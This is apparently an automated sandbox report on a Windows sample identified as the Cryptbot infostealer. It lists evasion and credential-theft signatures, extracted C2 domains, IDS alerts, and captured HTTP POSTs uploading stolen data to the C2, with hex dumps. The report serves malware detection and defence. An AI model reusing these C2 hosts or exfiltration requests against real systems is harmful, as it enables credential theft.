Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1558889
MD5: abf203dd0126ad56347d05e2c0f48322
SHA1: b6efee54668e99435319d65f634459eb561c1491
SHA256: 987b2a963feaca33452ac5dda999e1447f2732014c71c3bc3f5ced7d3227886a
Tags: exeuser-Bitsight
Infos:

Detection

Clipboard Hijacker, Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Cryptbot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops large PE files
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to dynamically determine API calls
Detected potential crypto function
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Found malware configuration
Source: file.exe.7292.0.memstrmin Malware Configuration Extractor: Cryptbot {"C2 list": ["QUERY|rd|A|IN|home.fvtekk5pn.top", "fvtekk5pn.top", "bfvtekk5pn.top", "CTR-DRBG.top", "SEED-SRC.top", "5pn.top", "QUERY|rd|AAAA|IN|home.fvtekk5pn.top", "QUERY|rd|A|IN|fvtekk5pn.top", "0/80/home.fvtekk5pn.top", "0/80/fvtekk5pn.top", "=gPfvtekk5pn.top", "80/80/home.fvtekk5pn.top", "=gPhome.fvtekk5pn.top", "home.fvtekk5pn.top"]}
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 36%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_010015B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 8_2_010015B0
Source: file.exe, 00000000.00000003.1720166130.0000000007452000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_ad1ebaf2-c
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\ Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea ecx, dword ptr [esp+04h] 8_2_010081E0
Source: chrome.exe Memory has grown: Private usage: 1MB later: 27MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49738 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49739 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49751 -> 34.116.198.130:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: QUERY|rd|A|IN|home.fvtekk5pn.top
Source: Malware configuration extractor URLs: fvtekk5pn.top
Source: Malware configuration extractor URLs: bfvtekk5pn.top
Source: Malware configuration extractor URLs: CTR-DRBG.top
Source: Malware configuration extractor URLs: SEED-SRC.top
Source: Malware configuration extractor URLs: 5pn.top
Source: Malware configuration extractor URLs: QUERY|rd|AAAA|IN|home.fvtekk5pn.top
Source: Malware configuration extractor URLs: QUERY|rd|A|IN|fvtekk5pn.top
Source: Malware configuration extractor URLs: 0/80/home.fvtekk5pn.top
Source: Malware configuration extractor URLs: 0/80/fvtekk5pn.top
Source: Malware configuration extractor URLs: =gPfvtekk5pn.top
Source: Malware configuration extractor URLs: 80/80/home.fvtekk5pn.top
Source: Malware configuration extractor URLs: =gPhome.fvtekk5pn.top
Source: Malware configuration extractor URLs: home.fvtekk5pn.top
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 465Content-Type: multipart/form-data; boundary=------------------------PosxaNr3OFbvKT2SfigKgyData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 50 6f 73 78 61 4e 72 33 4f 46 62 76 4b 54 32 53 66 69 67 4b 67 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 52 61 79 61 7a 65 68 65 70 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 67 ff 21 58 e0 83 42 61 2a 0b 46 6c e1 a1 aa ac e3 8e 5e 86 fc 79 b1 dc 32 d0 4c 9a 60 0c a6 22 2b b7 61 1f 33 ad 63 cc de 05 4f f0 bc fc b8 30 f7 4f 07 96 af 45 00 ce a6 a2 2d b1 1e d6 70 43 2c 1e 3c 69 21 4d 0c 56 59 97 4c de 08 da 6e 86 62 2c 2f 7d e3 73 37 28 13 c8 41 db fa a0 52 18 87 a0 69 4f 49 99 79 5a cd 66 90 06 b2 e6 9e a7 82 39 ca 32 c4 5e 6e e3 ed d9 69 bc 64 cd 34 bb d0 73 7c 18 01 ec f0 01 f4 06 14 37 ff f5 4c 9f 3a 85 32 cb 10 3b 96 a5 72 34 08 c1 fd 90 71 a1 76 28 93 c3 f6 b4 22 8f 43 3b d4 43 22 26 5e 54 55 b1 bf 12 ce 5a 4d 2e 40 cf 41 19 c5 a7 8f f1 4f 96 56 0d 1c 0c 56 f6 42 2c 78 1d 72 ec e5 1d 7b 42 2b 2b a3 dc 47 50 c3 a5 7d 1e db 97 bf e3 0a 1c ed d1 99 13 10 fe e4 01 fb d9 33 e5 6a e5 88 00 fc 12 69 de b6 cd 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 50 6f 73 78 61 4e 72 33 4f 46 62 76 4b 54 32 53 66 69 67 4b 67 79 2d 2d 0d 0a Data Ascii: --------------------------PosxaNr3OFbvKT2SfigKgyContent-Disposition: form-data; name="file"; filename="Rayazehep.bin"Content-Type: application/octet-streamg!XBa*Fl^y2L`"+a3cO0OE-pC,<i!MVYLnb,/}s7(ARiOIyZf92^nid4s|7L:2;r4qv("C;C"&^TUZM.@AOVVB,xr{B++GP}3ji--------------------------PosxaNr3OFbvKT2SfigKgy--
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 89868Content-Type: multipart/form-data; boundary=------------------------PNz4Tl8kZcoPw67gQse1oTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 50 4e 7a 34 54 6c 38 6b 5a 63 6f 50 77 36 37 67 51 73 65 31 6f 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 57 61 6d 6f 71 61 78 65 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 5f 8e e0 15 b1 73 70 f0 b3 7a a4 0d 29 1f b8 9a e9 21 ed 52 5b be 93 fb 51 8d 5d 12 05 f9 84 af c4 a5 6a ec 6a ef 89 74 1d 22 01 33 e2 2e 86 a6 23 37 bd bd ec fd fb 40 c6 8b c4 78 84 cc 9e 49 dc 0b b0 b6 3f 92 9b 4d ca a5 e2 7b 10 5c cf 83 54 e9 4b c0 db b6 33 24 98 62 cf 79 29 c3 51 2b 55 57 3f 28 b7 66 da 21 a3 42 91 84 e1 35 c3 00 5b da a7 f3 d3 df da a1 4e f7 8d fd ca dd 56 d5 88 65 bc d6 44 21 88 6d 18 a4 1c d8 de 3f cb 97 45 1e f6 65 c1 4a 60 34 83 2d 2e ca cf 66 f8 86 3f 0f d2 b2 c6 0a 37 1b 44 a9 07 94 5d b2 1c bf 62 27 bb 06 60 61 bd 82 73 75 d3 1f fb 2b ae 20 28 12 c4 8d 36 d2 03 aa b9 31 da 75 e3 31 75 c2 84 07 8d fe 2e 34 08 f9 c4 0b a7 f8 43 87 f5 1e e6 21 61 7f b2 2f c6 69 7b 99 da 1c 86 81 e9 7b 84 f9 b3 44 8b c0 f8 d4 6e ed 57 92 10 77 63 db a9 53 f3 8f 11 8b fd ad cd 32 ed 8c 33 22 05 01 46 ed c9 18 ed 9a dd 7d 37 4a d2 27 5c 9b 0f d4 c3 27 86 b6 c8 bb 7f 59 e8 87 d5 89 98 6a 52 5b f8 1c d2 c1 dd 57 89 a0 45 d4 23 95 45 7e 2e a8 23 c8 84 80 a8 2d ca 9e 9a 27 c9 e9 13 af b3 d9 86 44 3a 6e b2 89 79 75 29 ca cb ef b6 10 ea 3a b5 8f ab 98 b2 7c 3d a1 41 a6 0c 62 d7 3a 9c 8a 29 38 2c 48 6c 81 ca a7 e7 e2 a6 3a 38 59 77 29 66 70 fd e7 43 9f a7 f4 c7 eb dd 73 72 32 80 68 6b 36 cb bb e8 ef 36 e8 8e 14 16 72 f7 8f 08 c3 83 ad f1 cb 81 6f a3 79 bc 3b 41 ba 48 fb ac b4 89 00 5b 0b be 60 c5 29 54 19 93 ec b2 c1 9e 12 e4 4b de 32 5d 6a 47 07 c5 b6 cf db 17 65 46 21 f0 6b cf 95 e6 aa cf 2e 07 9e 18 f6 0c ee 4f e8 b0 d6 41 30 5b a9 57 af 7c 3f ea 1d 79 0c 2d 14 4d 1b 7f 54 d0 e6 30 f6 e3 6d 07 8f 25 b4 6d 39 d7 0f 51 b5 97 99 b5 37 4d f4 0c 50 3a 00 73 77 c0 98 15 1c 86 58 71 55 70 b6 ec 16 ad d8 5e 5c 31 fb 0a b8 46 01 c1 20 58 cd 19 9e 3d 22 f3 1f 50 ef 37 ed 45 aa 09 ad 2e c5 6f 3a 0e 62 8b 6c db cb 41 8d 93 4e 26 9e 89 1e 02 ac a0 da c5 ed aa 70 af f3 8b 8a 6b 71 fa c7 e1 f1 b0 3f c0 fe b8 ca f5 17 8a 46 39 be 75 5a 50 37 49 2e 45 04 70 7a ba b5 04 b4 ed e9 4f 48 bb 34 0e 2a d8 78 9b 2b 77 c0 3d 85 66 d3 2d 5d af 32 8d 37 b0 4c 26 9a 75 c3 ae bc 82 4e 77 97 0a a2 56 46 b0 77 8c ba 25 59 7e 2f 41 9d 5b c3 2a 58 34 b4 9c 22 c4 31 d7 d6 4e ce 7d 8b db c7 22 53 01 f6 e0 1e f9 00 ca bd 42 fd 0c 7f 67 cb 46 f2 07 5f ca 84 44 d1 0e c9 ef ac 94 75 ad fc bf 12 28 f8 53 25 82 0b d9 75 d4 88 bd df db c4 ec d9 a6 41 72 2f b6 84 fd 1c b6 09 88 27 9c b0 9f 40 ae 6d d6 63 a7 f5 3c 9a bd 5b b5
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 30017Content-Type: multipart/form-data; boundary=------------------------ryBiVqxT61N5lr8TI4quBPData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 72 79 42 69 56 71 78 54 36 31 4e 35 6c 72 38 54 49 34 71 75 42 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 69 74 75 6d 65 78 65 7a 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 81 e7 08 94 60 b8 63 ae dc d8 e6 2f 03 44 22 9b 09 04 1c 4e 0e a1 f5 01 8b 62 c3 65 30 81 16 72 54 82 88 62 9f c5 05 e6 ea 7c 26 ef c0 7e b8 c9 04 fe 0d bc d9 ae 7e 08 9a ef ae e3 2d 68 5e 30 e6 dc 2c 59 04 d2 96 0f 8f 0c 71 c7 1b c3 2b 1e 8d b7 e9 57 d9 15 7f 80 3c d0 c4 66 4a 0a cc 72 b1 b0 6a 91 3d 73 3b 31 f6 6e 10 5a ff 32 24 e8 58 12 19 60 a8 66 3c db 7b 3f 83 3c 2a c9 98 e5 1c 7d 3f f6 97 25 c9 29 52 bd f9 b2 b1 5f 98 ad 93 ea 06 f3 53 78 6c 1b 43 52 ef 6e 64 6f 99 e1 e5 5f 79 02 95 9a f0 64 90 dd 50 78 22 04 d6 c9 b1 aa 4f 35 0e cf cc 25 a3 0f 52 1e e9 bb 51 59 f2 7e 98 ca f2 5f 61 4a 27 79 af 59 43 cf 4a b2 42 66 e9 f9 ca 20 ca 72 e9 4c 5f 0f 36 5b bc 2b 3d 10 98 82 a1 5b 28 b1 22 4d 00 b1 ea df 07 03 7e a0 0e fd ef e3 43 88 8e d1 31 85 e9 57 96 a0 c6 d4 b2 2e db 85 cd 62 5a 41 56 eb a6 a4 41 98 59 80 f8 aa 45 4b 0b 2a 84 01 40 a8 3c 04 36 4c 64 cc c2 e4 4d e2 a7 bb 2f d4 1c fa af 90 27 8f f6 62 4b 11 87 90 68 34 7a 64 89 73 01 9f 43 45 70 80 09 9a e3 99 b1 cf 76 f9 13 d9 97 5f 5b 5b 01 b5 a9 25 e3 bb 3e 29 72 06 c8 37 ce e6 8b c5 f9 58 7c a4 1d 19 c2 53 44 7f 38 90 0e 82 af e4 cc dd 97 ec 64 0c 2e bf 5c 1c 23 67 ae 1e 15 67 3e bd b2 14 eb 1e c7 8e 14 2f d1 9a b5 53 88 81 43 b2 c6 a0 7c b1 90 13 49 5b b2 fe c4 99 a8 39 ce c6 59 e7 d1 e3 15 35 53 96 e1 06 b6 f3 cb 5e 8c b7 5c 4c 85 b4 33 b9 f6 56 5e 9d d3 a8 90 c7 53 6d 17 d2 be 72 6a 9c e0 09 dd 1f 5e a2 62 40 a1 99 93 52 f7 ff 4f f1 68 49 2b 9e c3 12 ce 25 7a 31 28 05 9a e8 6a 77 dd 6b 88 3d b5 77 70 9d 6a 12 d4 40 b4 8b 2a bd 3b 21 4e 7d 5d 52 36 b0 0d 7a b8 b7 0c 75 58 8f 7c d6 fd 88 18 26 53 20 97 6f 96 f8 bb 1c c9 c1 fe 18 6c ea f2 59 4f 6a 85 27 ae 52 13 64 90 69 5a 26 e1 5d ba 9b f9 c8 e5 d9 f7 ee 0d 53 31 41 43 e7 d8 62 f6 4b bd 12 b8 ea 3f 92 33 d7 bc e0 fc 17 90 dd 56 04 60 95 65 c8 ad 0f de d7 9a bc 63 28 15 dc 3b 0d aa a9 cd 2a e4 3d 78 d5 71 74 e7 9c 61 6c 91 44 26 9f e9 1e e7 d2 34 e8 2f de d1 a0 e7 96 f3 09 2b 19 e8 d3 58 ae 4e b0 0b 96 35 c4 6e b1 b6 3d 8d cf 01 39 e6 86 f2 df a4 e3 eb fb 8f 9e 64 c9 b8 e5 5c c4 0d ab 52 7d a0 96 c3 86 d9 d2 8e 63 f0 b0 60 a9 32 14 e6 6b ea 7f 6b 65 e5 2b fa 02 21 d4 51 aa d6 7d 7a 92 fd ae d7 6a e0 eb c5 b2 71 d8 e2 bf 20 16 69 e5 62 16 46 cf ba 82 ce 12 7e 5a 7f 27 8b 20 c1 d7 ae 0f ea 52 17 fa a8 be 82 fd 37 b8 59 55 ed 49 96 f8 27 e6 b0 b3 a6 57 c5 53 9f a1 6c 64 8a 5e
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View IP Address: 34.116.198.130 34.116.198.130
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: chrome.exe, 00000004.00000002.2197643768.00005D00006DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.2197643768.00005D00006DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000003.2173708534.00005D0000F80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2173452712.00005D000037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2173815906.00005D00003A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000004.00000003.2173708534.00005D0000F80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2173452712.00005D000037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2173815906.00005D00003A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000004.00000002.2197643768.00005D00006DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.2197643768.00005D00006DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.2195634012.00005D00002C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: home.fvtekk5pn.top
Source: global traffic DNS traffic detected: DNS query: fvtekk5pn.top
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: unknown HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 465Content-Type: multipart/form-data; boundary=------------------------PosxaNr3OFbvKT2SfigKgyData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 50 6f 73 78 61 4e 72 33 4f 46 62 76 4b 54 32 53 66 69 67 4b 67 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 52 61 79 61 7a 65 68 65 70 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 67 ff 21 58 e0 83 42 61 2a 0b 46 6c e1 a1 aa ac e3 8e 5e 86 fc 79 b1 dc 32 d0 4c 9a 60 0c a6 22 2b b7 61 1f 33 ad 63 cc de 05 4f f0 bc fc b8 30 f7 4f 07 96 af 45 00 ce a6 a2 2d b1 1e d6 70 43 2c 1e 3c 69 21 4d 0c 56 59 97 4c de 08 da 6e 86 62 2c 2f 7d e3 73 37 28 13 c8 41 db fa a0 52 18 87 a0 69 4f 49 99 79 5a cd 66 90 06 b2 e6 9e a7 82 39 ca 32 c4 5e 6e e3 ed d9 69 bc 64 cd 34 bb d0 73 7c 18 01 ec f0 01 f4 06 14 37 ff f5 4c 9f 3a 85 32 cb 10 3b 96 a5 72 34 08 c1 fd 90 71 a1 76 28 93 c3 f6 